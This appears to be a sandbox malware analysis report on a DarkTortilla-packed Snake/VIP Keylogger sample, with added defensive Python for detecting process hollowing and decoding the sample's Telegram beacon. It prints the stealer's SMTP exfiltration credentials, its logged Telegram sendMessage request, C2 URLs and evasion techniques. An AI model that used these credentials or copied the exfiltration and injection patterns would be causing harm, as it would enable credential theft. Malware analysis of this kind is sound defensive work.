Windows Analysis Report
sS7Jrsk0Z7.exe

Overview

General Information

Sample name: sS7Jrsk0Z7.exe (renamed because the original name is a hash value)
Original sample name: 399908f6dc7e0dcad418f2cadd782f26f66adfdf1e523725dbc14713033c44a7.exe
Analysis ID: 1588892
MD5: 6de308ce9b42f3ca44d87cd354dde9ae
SHA1: 6071d1e4f71527bb4e23f0ffce53b30dcb89500b
SHA256: 399908f6dc7e0dcad418f2cadd782f26f66adfdf1e523725dbc14713033c44a7
Tags: exe, user-adrian__luca

Detection

DarkTortilla, Snake Keylogger, VIP Keylogger
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected DarkTortilla Crypter
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
AI detected suspicious sample
Allocates memory in foreign processes
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects a PE file into a foreign process
Machine Learning detection for sample
Tries to delay execution (extensive OutputDebugStringW loop)
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality to launch a process as a different user
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • sS7Jrsk0Z7.exe (PID: 6676 cmdline: "C:\Users\user\Desktop\sS7Jrsk0Z7.exe" MD5: 6DE308CE9B42F3CA44D87CD354DDE9AE)
    • InstallUtil.exe (PID: 7612 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
  • cleanup
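The process tree above shows the sample, run from the user's Desktop, starting the .NET framework utility InstallUtil.exe with no command-line arguments, and the signature list reports that the sample creates a process in suspended mode, allocates and writes memory in a foreign process and injects a PE file into it. That combination is the hollowing pattern .NET crypters such as DarkTortilla use: a signed Microsoft binary is launched suspended and its image is replaced with the unpacked payload, which is why the Yara hits and C2 strings later in this report appear in InstallUtil.exe's memory (10.2.InstallUtil.exe.400000.0.unpack). The Python below is an added example, not code from the Joe Sandbox report or from the malware: it applies that heuristic to process-creation events of the kind Sysmon Event ID 1 provides. The events are constructed from the report's process tree (the explorer.exe parent and the benign build-tool pair are my additions), and the .NET host binaries other than InstallUtil.exe are from my own experience, not from this report.

```python
"""Process-tree heuristic for .NET host hollowing (added example, not report code)."""
import ntpath
import re
from dataclasses import dataclass
from typing import Dict, List

# InstallUtil.exe is the host this report shows. The other names are .NET
# framework utilities that are abused the same way; they are my addition,
# not something this report documents.
NET_HOST_BINARIES = {
    "installutil.exe", "regasm.exe", "regsvcs.exe", "msbuild.exe",
    "applaunch.exe", "aspnet_compiler.exe", "caspol.exe",
}

# Directories an unprivileged user can write to. A parent running from one of
# these is not an installed application, which is what makes the child
# interesting. Matched against the ntpath-normalised (lower-case, backslash) path.
USER_WRITABLE = re.compile(
    r"^[a-z]:\\users\\[^\\]+\\(desktop|downloads|documents|appdata)\\"
)


@dataclass
class ProcessEvent:
    """The Sysmon Event ID 1 (ProcessCreate) fields the rule needs."""
    pid: int
    ppid: int
    image: str
    cmdline: str


def cmdline_args(cmdline: str) -> str:
    """Return the argument part of a command line, dropping the quoted or bare program path."""
    cmdline = cmdline.strip()
    if cmdline.startswith('"'):
        closing = cmdline.find('"', 1)
        return cmdline[closing + 1:].strip() if closing != -1 else ""
    return cmdline.partition(" ")[2].strip()


def find_hollowed_net_hosts(events: List[ProcessEvent]) -> List[Dict[str, object]]:
    """Flag .NET host binaries started with no arguments by a parent in a user-writable path.

    Legitimate InstallUtil/RegAsm/MSBuild invocations carry an assembly or project
    path; an argument-less start whose parent lives under the user's profile is a
    hollowing target being created (typically suspended) for injection.
    """
    by_pid: Dict[int, ProcessEvent] = {e.pid: e for e in events}
    alerts: List[Dict[str, object]] = []
    for child in events:
        if ntpath.basename(child.image).lower() not in NET_HOST_BINARIES:
            continue
        if cmdline_args(child.cmdline):
            continue  # has an argument: normal tooling use
        parent = by_pid.get(child.ppid)
        if parent is None or not USER_WRITABLE.match(ntpath.normcase(parent.image)):
            continue
        alerts.append({
            "rule": "net-host-hollowing",
            "child_pid": child.pid,
            "child_image": child.image,
            "parent_pid": parent.pid,
            "parent_image": parent.image,
            "reason": "argument-less .NET host spawned by a process in a user-writable directory",
        })
    return alerts


# Constructed from the report's process tree. PID 4242 (explorer.exe) and the
# build-tool pair 9001/9002 are my additions: a parent for the sample and a
# benign control in which InstallUtil.exe receives an assembly path.
SAMPLE_EVENTS = [
    ProcessEvent(4242, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcessEvent(6676, 4242, r"C:\Users\user\Desktop\sS7Jrsk0Z7.exe",
                 r'"C:\Users\user\Desktop\sS7Jrsk0Z7.exe"'),
    ProcessEvent(7612, 6676, r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe",
                 r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"'),
    ProcessEvent(9001, 4242, r"C:\Users\user\Desktop\build\build.exe",
                 r'"C:\Users\user\Desktop\build\build.exe"'),
    ProcessEvent(9002, 9001, r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe",
                 r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" C:\Users\user\Desktop\build\Service.dll'),
]

if __name__ == "__main__":
    for alert in find_hollowed_net_hosts(SAMPLE_EVENTS):
        print(alert)
```

Only PID 7612 is flagged; the control invocation with an assembly path passes. The argument check is what keeps this rule quiet on developer machines, and the parent-path check is what separates a crypter dropped into Desktop or Downloads from an installed product calling the same utility.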
Name: DarkTortilla
Description: DarkTortilla is a complex and highly configurable .NET-based crypter that has possibly been active since at least August 2015. It typically delivers popular information stealers and remote access trojans (RATs) such as AgentTesla, AsyncRat, NanoCore, and RedLine. While it appears to primarily deliver commodity malware, Secureworks Counter Threat Unit (CTU) researchers identified DarkTortilla samples delivering targeted payloads such as Cobalt Strike and Metasploit. It can also deliver "addon packages" such as additional malicious payloads, benign decoy documents, and executables. It features robust anti-analysis and anti-tamper controls that can make detection, analysis, and eradication challenging. From January 2021 through May 2022, an average of 93 unique DarkTortilla samples per week were uploaded to the VirusTotal analysis service. Code similarities suggest possible links between DarkTortilla and other malware: a crypter operated by the RATs Crew threat group, which was active between 2008 and 2012, and the Gameloader malware that emerged in 2021.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.darktortilla
Name: 404 Keylogger, Snake Keylogger
Description: Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victim's sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
Extracted configuration (VIP Keylogger): {"Exfil Mode": "SMTP", "Email ID": "sammys@gtpv.online", "Password": "7213575aceACE@@", "Host": "mail.gtpv.online", "Port": "587"}
Extracted configuration (Snake Keylogger): {"Exfil Mode": "SMTP", "Username": "sammys@gtpv.online", "Password": "7213575aceACE@@", "Host": "mail.gtpv.online", "Port": "587", "Version": "4.4"}
Both extractors recover the same SMTP account, which fits the memory region at 0x3BA9000 matching the VIPKeylogger, CredentialStealer, TelegramRAT and Windows_Trojan_SnakeKeylogger rules at once: the two family labels describe one embedded stealer. Note that the network evidence listed below contains no DNS query for mail.gtpv.online and no port 587 connection, so the SMTP exfiltration was not exercised during the analysis window; the mailbox and host above are the indicators to act on, not observed traffic.
Yara matches in memory dumps (Source | Rule | Description | Author), first 5 of 26 entries:
00000001.00000002.1806875709.0000000005070000.00000004.08000000.00040000.00000000.sdmp | JoeSecurity_DarkTortilla | Yara detected DarkTortilla Crypter | Joe Security
00000001.00000002.1805361382.0000000003BA9000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000001.00000002.1805361382.0000000003BA9000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_VIPKeylogger | Yara detected VIP Keylogger | Joe Security
00000001.00000002.1805361382.0000000003BA9000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security
00000001.00000002.1805361382.0000000003BA9000.00000004.00000800.00020000.00000000.sdmp | Windows_Trojan_SnakeKeylogger_af3faa65 | unknown | unknown
  Matched strings:
  • 0x2dff0: $a1: get_encryptedPassword
  • 0x2e578: $a2: get_encryptedUsername
  • 0x2dc63: $a3: get_timePasswordChanged
  • 0x2dd7a: $a4: get_passwordField
  • 0x2e006: $a5: set_encryptedPassword
  • 0x30d22: $a6: get_passwords
  • 0x310b6: $a7: get_logins
  • 0x30d0e: $a8: GetOutlookPasswords
  • 0x306c7: $a9: StartKeylogger
  • 0x3100f: $a10: KeyLoggerEventArgs
  • 0x30767: $a11: KeyLoggerEventArgsEventHandler
Yara matches in unpacked PEs (Source | Rule | Description | Author), first 5 of 61 entries:
1.2.sS7Jrsk0Z7.exe.3c98e40.5.unpack | JoeSecurity_DarkTortilla | Yara detected DarkTortilla Crypter | Joe Security
1.2.sS7Jrsk0Z7.exe.3d18e60.0.unpack | JoeSecurity_DarkTortilla | Yara detected DarkTortilla Crypter | Joe Security
1.2.sS7Jrsk0Z7.exe.3c98e40.5.raw.unpack | JoeSecurity_DarkTortilla | Yara detected DarkTortilla Crypter | Joe Security
1.2.sS7Jrsk0Z7.exe.5070000.6.unpack | JoeSecurity_DarkTortilla | Yara detected DarkTortilla Crypter | Joe Security
1.2.sS7Jrsk0Z7.exe.3d18e60.0.raw.unpack | JoeSecurity_DarkTortilla | Yara detected DarkTortilla Crypter | Joe Security
                    No Sigma rule has matched
Suricata IDS alerts (Timestamp | SID | Severity | Classtype | Source IP:Port | Destination IP:Port | Protocol):
2025-01-11T06:49:56.699912+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.7:49976 | 104.21.64.1:443 | TCP
2025-01-11T06:50:00.340945+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.7:49983 | 104.21.64.1:443 | TCP
2025-01-11T06:50:24.253611+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.7:49987 | 104.21.64.1:443 | TCP
2025-01-11T06:50:32.505128+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.7:49991 | 104.21.64.1:443 | TCP
2025-01-11T06:49:54.998464+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.7:49974 | 158.101.44.242:80 | TCP
2025-01-11T06:49:56.108675+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.7:49974 | 158.101.44.242:80 | TCP
2025-01-11T06:49:57.373425+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.7:49978 | 158.101.44.242:80 | TCP
2025-01-11T06:49:58.560996+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.7:49980 | 158.101.44.242:80 | TCP
2025-01-11T06:50:33.465505+0100 | 1810007 | 1 | Potentially Bad Traffic | 192.168.2.7:49992 | 149.154.167.220:443 | TCP

                    AV Detection

Source: 00000001.00000002.1805361382.0000000003BA9000.00000004.00000800.00020000.00000000.sdmp | Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "sammys@gtpv.online", "Password": "7213575aceACE@@", "Host": "mail.gtpv.online", "Port": "587", "Version": "4.4"}
Source: 1.2.sS7Jrsk0Z7.exe.3e4ca8a.1.unpack | Malware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "sammys@gtpv.online", "Password": "7213575aceACE@@", "Host": "mail.gtpv.online", "Port": "587"}
Source: sS7Jrsk0Z7.exe | ReversingLabs: Detection: 75%
Source: sS7Jrsk0Z7.exe | Virustotal: Detection: 65%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: sS7Jrsk0Z7.exe | Joe Sandbox ML: detected

                    Location Tracking

Source: unknown | DNS query: name: reallyfreegeoip.org
Source: sS7Jrsk0Z7.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.7:49975 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49992 version: TLS 1.2
Source: sS7Jrsk0Z7.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 4x nop then jmp 0123F8E9h | 10_2_0123F631
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 4x nop then jmp 0123FD41h | 10_2_0123FA88

                    Networking

Source: Network traffic | Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.7:49992 -> 149.154.167.220:443
Source: unknown | DNS query: name: api.telegram.org
Source: Yara match | File source: 1.2.sS7Jrsk0Z7.exe.3e4ca8a.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.sS7Jrsk0Z7.exe.3c2f6d0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.sS7Jrsk0Z7.exe.3e099ba.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.sS7Jrsk0Z7.exe.3dc68da.3.raw.unpack, type: UNPACKEDPE
Source: global traffic | HTTP traffic detected (5 times): GET /xml/8.46.123.189 HTTP/1.1 [Host: reallyfreegeoip.org] [Connection: Keep-Alive]
Source: global traffic | HTTP traffic detected (4 times): GET /xml/8.46.123.189 HTTP/1.1 [Host: reallyfreegeoip.org]
Source: global traffic | HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:610930%0D%0ADate%20and%20Time:%2012/01/2025%20/%2019:38:03%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20610930%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 [Host: api.telegram.org] [Connection: Keep-Alive]
Source: Joe Sandbox View | IP Address: 149.154.167.220
Source: Joe Sandbox View | IP Address: 104.21.64.1
Source: Joe Sandbox View | IP Address: 158.101.44.242
Source: Joe Sandbox View | JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown | DNS query: name: checkip.dyndns.org
Source: unknown | DNS query: name: reallyfreegeoip.org
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49980 -> 158.101.44.242:80
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49978 -> 158.101.44.242:80
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49974 -> 158.101.44.242:80
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49987 -> 104.21.64.1:443
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49983 -> 104.21.64.1:443
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49976 -> 104.21.64.1:443
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49991 -> 104.21.64.1:443
Source: global traffic | HTTP traffic detected (6 times): GET / HTTP/1.1 [User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)] [Host: checkip.dyndns.org] [Connection: Keep-Alive]
Source: global traffic | HTTP traffic detected (4 times): GET / HTTP/1.1 [User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)] [Host: checkip.dyndns.org]
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 (3 times)
Source: global traffic | DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic | DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic | DNS traffic detected: DNS query: api.telegram.org
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found [Server: nginx/1.18.0] [Date: Sat, 11 Jan 2025 05:50:33 GMT] [Content-Type: application/json] [Content-Length: 55] [Connection: close] [Strict-Transport-Security: max-age=31536000; includeSubDomains; preload] [Access-Control-Allow-Origin: *] [Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection]
This 404 is the reply to the Telegram sendMessage request: its Date header (05:50:33 GMT) matches the 06:50:33 +0100 Suricata alert for 192.168.2.7:49992 -> 149.154.167.220:443, and the request path /bot/sendMessage carries an empty bot token and an empty chat_id, so the Bot API cannot route the message. The Telegram channel in this build is therefore non-functional; the SMTP account in the extracted configuration is the exfiltration path that is actually configured.
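The three request types the sandbox logged (GET / on checkip.dyndns.org for the public IP, GET /xml/<ip> on reallyfreegeoip.org for the country, and GET /bot<token>/sendMessage on api.telegram.org for the beacon) are the stealer's whole network footprint in this run, and the empty token in /bot/sendMessage is what turns the last one into the 404 above. The Python below is an added example, not code from the report or from the malware: it parses raw requests of the shape the sandbox logged, decodes the Telegram beacon into its fields, and returns triage findings per request. The sample requests are reconstructed from the report's HTTP lines with CRLF line breaks restored; the role descriptions and finding texts are my own wording.

```python
"""Triage of the HTTP requests logged in the report (added example, not report code)."""
import re
from typing import Dict, List, Optional
from urllib.parse import parse_qs, urlsplit

# Hosts the report shows the sample contacting and what each request is for.
# The role text is my reading of the traffic, not a field from the report.
KNOWN_ROLES = {
    "checkip.dyndns.org": "public IP discovery (plain HTTP, port 80)",
    "reallyfreegeoip.org": "geolocation of the discovered IP (country check)",
    "api.telegram.org": "Telegram Bot API beacon/exfiltration",
}

# Bot API targets look like /bot<token>/<method>; the token may be empty, as here.
TELEGRAM_PATH = re.compile(r"^/bot(?P<token>[^/]*)/(?P<method>[A-Za-z]+)$")


def parse_request(raw: str) -> Dict[str, object]:
    """Split a raw HTTP/1.x request into its request line and a lower-cased header map."""
    head = raw.split("\r\n\r\n", 1)[0]
    request_line, *header_lines = head.split("\r\n")
    method, target, version = request_line.split(" ", 2)
    headers: Dict[str, str] = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        if name:
            headers[name.strip().lower()] = value.strip()
    return {"method": method, "target": target, "version": version, "headers": headers}


def decode_telegram_beacon(target: str) -> Optional[Dict[str, str]]:
    """Return token, chat_id and the decoded message of a sendMessage target, or None."""
    parts = urlsplit(target)
    m = TELEGRAM_PATH.match(parts.path)
    if m is None or m.group("method") != "sendMessage":
        return None
    query = parse_qs(parts.query, keep_blank_values=True)  # percent-decodes the values
    return {
        "token": m.group("token"),
        "chat_id": query.get("chat_id", [""])[0],
        "text": query.get("text", [""])[0],
    }


def beacon_fields(text: str) -> Dict[str, str]:
    """Turn the 'Key: value' lines of the beacon text into a dict; the bracketed tail line is skipped."""
    fields: Dict[str, str] = {}
    for line in text.split("\r\n"):
        if ":" in line and not line.startswith("["):
            key, _, value = line.partition(":")
            fields[key.strip()] = value.strip()
    return fields


def triage(raw: str) -> List[str]:
    """Return human-readable findings for one request."""
    req = parse_request(raw)
    headers: Dict[str, str] = req["headers"]  # type: ignore[assignment]
    host = headers.get("host", "")
    findings: List[str] = []
    if host in KNOWN_ROLES:
        findings.append(f"{host}: {KNOWN_ROLES[host]}")
    ua = headers.get("user-agent")
    if ua is None:
        findings.append("no User-Agent header (the 'HTTP GET or POST without a user agent' signature)")
    elif "MSIE 6.0" in ua:
        findings.append("legacy IE6 / Windows NT 5.2 User-Agent that cannot be the analysis host's browser")
    if host == "api.telegram.org":
        beacon = decode_telegram_beacon(str(req["target"]))
        if beacon is not None:
            if not beacon["token"] or not beacon["chat_id"]:
                findings.append("Telegram beacon with empty bot token/chat_id: undeliverable (matches the 404 reply)")
            findings.append("beacon fields: " + str(beacon_fields(beacon["text"])))
    return findings


# Reconstructed from the report's 'HTTP traffic detected' lines (CRLF restored).
TELEGRAM_TEXT = (
    "%20%0D%0A%0D%0APC%20Name:610930%0D%0ADate%20and%20Time:%2012/01/2025%20/%2019:38:03"
    "%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20610930%20Clicked%20on%20the%20File"
    "%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D"
)
SAMPLE_REQUESTS = [
    "GET / HTTP/1.1\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)\r\n"
    "Host: checkip.dyndns.org\r\nConnection: Keep-Alive\r\n\r\n",
    "GET /xml/8.46.123.189 HTTP/1.1\r\nHost: reallyfreegeoip.org\r\nConnection: Keep-Alive\r\n\r\n",
    f"GET /bot/sendMessage?chat_id=&text={TELEGRAM_TEXT} HTTP/1.1\r\n"
    "Host: api.telegram.org\r\nConnection: Keep-Alive\r\n\r\n",
]

if __name__ == "__main__":
    for raw in SAMPLE_REQUESTS:
        for finding in triage(raw):
            print(finding)
        print()
```

Decoding the beacon gives the victim identifier (PC Name 610930), the local timestamp and the country the geoip lookup returned, which is what a responder needs to match this run against a real infection. For detection, the combination to key on is a request to api.telegram.org whose path starts with /bot/ (empty token) or whose chat_id is empty: no legitimate Bot API client sends that, and it is unaffected by the operator later fixing the token.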
Source: sS7Jrsk0Z7.exe, 00000001.00000002.1805361382.0000000003BA9000.00000004.00000800.00020000.00000000.sdmp, sS7Jrsk0Z7.exe, 00000001.00000002.1805361382.0000000003C2F000.00000004.00000800.00020000.00000000.sdmp, sS7Jrsk0Z7.exe, 00000001.00000002.1805361382.0000000003DC6000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.2525054374.0000000000402000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
Source: sS7Jrsk0Z7.exe, 00000001.00000002.1805361382.0000000003BA9000.00000004.00000800.00020000.00000000.sdmp, sS7Jrsk0Z7.exe, 00000001.00000002.1805361382.0000000003C2F000.00000004.00000800.00020000.00000000.sdmp, sS7Jrsk0Z7.exe, 00000001.00000002.1805361382.0000000003DC6000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.2525054374.0000000000402000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.2528573106.0000000002BA1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://aborters.duckdns.org:8081
Source: sS7Jrsk0Z7.exe, 00000001.00000002.1805361382.0000000003BA9000.00000004.00000800.00020000.00000000.sdmp, sS7Jrsk0Z7.exe, 00000001.00000002.1805361382.0000000003C2F000.00000004.00000800.00020000.00000000.sdmp, sS7Jrsk0Z7.exe, 00000001.00000002.1805361382.0000000003DC6000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.2525054374.0000000000402000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.2528573106.0000000002BA1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://anotherarmy.dns.army:8081
Source: sS7Jrsk0Z7.exe | String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: sS7Jrsk0Z7.exe | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: sS7Jrsk0Z7.exe | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: InstallUtil.exe, 0000000A.00000002.2528573106.0000000002BA1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org
Source: InstallUtil.exe, 0000000A.00000002.2528573106.0000000002BA1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org/
Source: sS7Jrsk0Z7.exe, 00000001.00000002.1805361382.0000000003BA9000.00000004.00000800.00020000.00000000.sdmp, sS7Jrsk0Z7.exe, 00000001.00000002.1805361382.0000000003C2F000.00000004.00000800.00020000.00000000.sdmp, sS7Jrsk0Z7.exe, 00000001.00000002.1805361382.0000000003DC6000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.2525054374.0000000000402000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org/q
Source: sS7Jrsk0Z7.exe | String found in binary or memory: http://crl.globalsign.com/codesigningrootr45.crl0U
Source: sS7Jrsk0Z7.exe | String found in binary or memory: http://crl.globalsign.com/gsgccr45evcodesignca2020.crl0
Source: sS7Jrsk0Z7.exe | String found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
Source: sS7Jrsk0Z7.exe | String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: sS7Jrsk0Z7.exe | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: sS7Jrsk0Z7.exe | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: sS7Jrsk0Z7.exe | String found in binary or memory: http://ocsp.digicert.com0A
Source: sS7Jrsk0Z7.exe | String found in binary or memory: http://ocsp.digicert.com0C
Source: sS7Jrsk0Z7.exe | String found in binary or memory: http://ocsp.digicert.com0X
Source: sS7Jrsk0Z7.exe | String found in binary or memory: http://ocsp.globalsign.com/codesigningrootr450F
Source: sS7Jrsk0Z7.exe | String found in binary or memory: http://ocsp.globalsign.com/gsgccr45evcodesignca20200U
Source: sS7Jrsk0Z7.exe | String found in binary or memory: http://ocsp.globalsign.com/rootr30;
Source: InstallUtil.exe, 0000000A.00000002.2528573106.0000000002BA1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: sS7Jrsk0Z7.exe | String found in binary or memory: http://secure.globalsign.com/cacert/codesigningrootr45.crt0A
Source: sS7Jrsk0Z7.exe | String found in binary or memory: http://secure.globalsign.com/cacert/gsgccr45evcodesignca2020.crt0?
Source: sS7Jrsk0Z7.exe | String found in binary or memory: http://secure.globalsign.com/cacert/root-r3.crt06
Source: sS7Jrsk0Z7.exe, 00000001.00000002.1805361382.0000000003BA9000.00000004.00000800.00020000.00000000.sdmp, sS7Jrsk0Z7.exe, 00000001.00000002.1805361382.0000000003C2F000.00000004.00000800.00020000.00000000.sdmp, sS7Jrsk0Z7.exe, 00000001.00000002.1805361382.0000000003DC6000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.2525054374.0000000000402000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.2528573106.0000000002BA1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://varders.kozow.com:8081
Two caveats on the strings above. The four port-8081 endpoints (51.38.247.67, aborters.duckdns.org, anotherarmy.dns.army, varders.kozow.com) occur only as embedded strings in the unpacked payload; none of them appears in the DNS queries or Suricata alerts of this run, so treat them as dormant or alternate infrastructure rather than observed C2. The DigiCert and GlobalSign CRL, OCSP and cacert URLs are found only in the on-disk sample and come from the Authenticode signature attached to it, which the report flags as invalid (PE / OLE file has an invalid certificate); they are not contacted by the malware.
                    Source: InstallUtil.exe, 0000000A.00000002.2531605024.0000000003BC1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.2531605024.0000000003EB9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                    Source: InstallUtil.exe, 0000000A.00000002.2528573106.0000000002C86000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
